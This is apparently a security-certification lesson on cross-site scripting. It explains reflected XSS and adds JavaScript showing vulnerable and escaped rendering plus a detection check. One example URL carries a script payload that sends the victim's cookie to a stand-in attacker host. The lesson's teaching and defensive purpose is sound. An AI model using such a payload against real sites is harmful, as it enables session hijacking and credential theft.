Security+ Academy · Lesson

Cross-Site Scripting (XSS) and CSRF

Understand reflected, stored, and DOM-based XSS, along with cross-site request forgery attacks, and the browser-level defenses that block them.

What Is Cross-Site Scripting?

Cross-Site Scripting (XSS) is a client-side injection vulnerability where an attacker injects malicious scripts into web pages viewed by other users. Unlike SQL injection, which targets the server, XSS targets the victim's browser. When the browser renders the attacker's script, it executes with the same privileges as legitimate page scripts — enabling session hijacking, credential theft, and malware delivery.

Reflected XSS Explained

Reflected XSS occurs when malicious script is embedded in a URL and the server immediately 'reflects' it back in the HTTP response without proper encoding. The victim is tricked (often via a phishing link) into clicking the crafted URL, causing their browser to execute the attacker's script. Reflected XSS is non-persistent — it only executes when the victim clicks the malicious link.

# Malicious URL with reflected XSS payload
https://example.com/search?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

# Server reflects the query param unsanitized into the HTML:
# <p>Results for: <script>...</script></p>
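The reflection above, as an added example that is not part of the original lesson: a hypothetical search handler in JavaScript, shown first with the raw concatenation the lesson describes and then with HTML output encoding for the text context the value lands in, plus a small check a reviewer or scanner could run on a response body. Function names and the sample URL are assumptions for the demonstration.

```javascript
// Added example (not from the original lesson). Sample values are constructed.

// Minimal entity encoder for untrusted text placed inside an HTML element body.
// '&' is handled first so already-encoded output is not double-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// VULNERABLE: the query value is concatenated straight into the response,
// so any markup in "q" becomes live markup in the victim's browser.
function renderSearchUnsafe(q) {
  return '<p>Results for: ' + q + '</p>';
}

// HARDENED: same page, but the untrusted value is encoded for the HTML text
// context, so the browser displays the literal characters instead of a tag.
function renderSearchSafe(q) {
  return '<p>Results for: ' + escapeHtml(q) + '</p>';
}

// Hypothetical request handler: pull "q" from the URL (URLSearchParams
// percent-decodes it) and hand it to whichever renderer is in use.
function handleSearchRequest(urlString, render) {
  const url = new URL(urlString);
  const q = url.searchParams.get('q') ?? '';
  return render(q);
}

// Detection check for a response body: did the reflected value come back
// as a raw <script> start tag rather than as encoded text?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed probe in the shape of a reflected XSS test string.
const probeUrl = 'https://example.com/search?q=<script>alert(1)</script>';

console.log(handleSearchRequest(probeUrl, renderSearchUnsafe)); // raw tag survives
console.log(handleSearchRequest(probeUrl, renderSearchSafe));   // rendered as text
```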
